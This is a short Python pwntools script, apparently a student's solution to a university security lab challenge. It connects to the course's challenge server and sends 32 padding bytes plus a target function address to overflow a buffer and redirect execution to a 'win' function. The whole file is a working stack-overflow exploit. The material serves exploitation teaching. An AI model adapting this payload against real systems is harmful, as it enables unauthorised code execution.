Files
ssof_labs/pa/lab6/chall_calling_functions.py
2025-12-20 16:49:47 +00:00

13 lines
214 B
Python

from pwn import *
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25153
WIN_ADDR = 0x080486f1
conn = remote(HOST, PORT)
conn.recvuntil("?\n")
conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
conn.interactive()